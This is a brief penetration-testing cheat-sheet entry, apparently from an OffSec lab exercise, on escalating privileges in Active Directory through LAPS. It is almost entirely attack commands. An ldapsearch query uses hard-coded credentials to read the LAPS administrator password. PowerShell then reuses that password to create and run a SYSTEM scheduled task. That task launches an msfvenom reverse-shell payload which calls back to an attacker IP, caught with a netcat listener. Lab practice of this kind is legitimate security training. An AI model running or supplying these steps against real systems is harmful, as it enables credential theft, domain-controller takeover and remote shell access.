LAPS password
Sometimes, you can query LAPS password via ldapsearch. You could use the password to create a task scheduler to escalate
Enumerate
Kali> ldapsearch -H ldap://$RHOST -x -D fmcsorley@HUTCH.OFFSEC -w CrabSharkJellyfish192 -b "DC=hutch,DC=offsec" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
# WinEPAS or AdPEAS may capture the LAPS password as well.
Create a tasklist.
PS> $pw = ConvertTo-SecureString "iF1n(Q5m2Fv9u3" -AsPlainText -Force
PS> $creds = New-Object System.Management.Automation.PSCredential ("Administrator", $pw)
PS> Invoke-Command -Computer hutchdc -ScriptBlock { schtasks /create /sc onstart /tn shell /tr C:\inetpub\wwwroot\shell.exe /ru SYSTEM } -Credential $creds
Execution
Kali> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.142.155 LPORT=53 -f exe -o shell.exe
Kali> rlwrap nc -nlvp 53
PS> Invoke-Command -Computer hutchdc -ScriptBlock { schtasks /run /tn shell } -Credential $creds
Last updated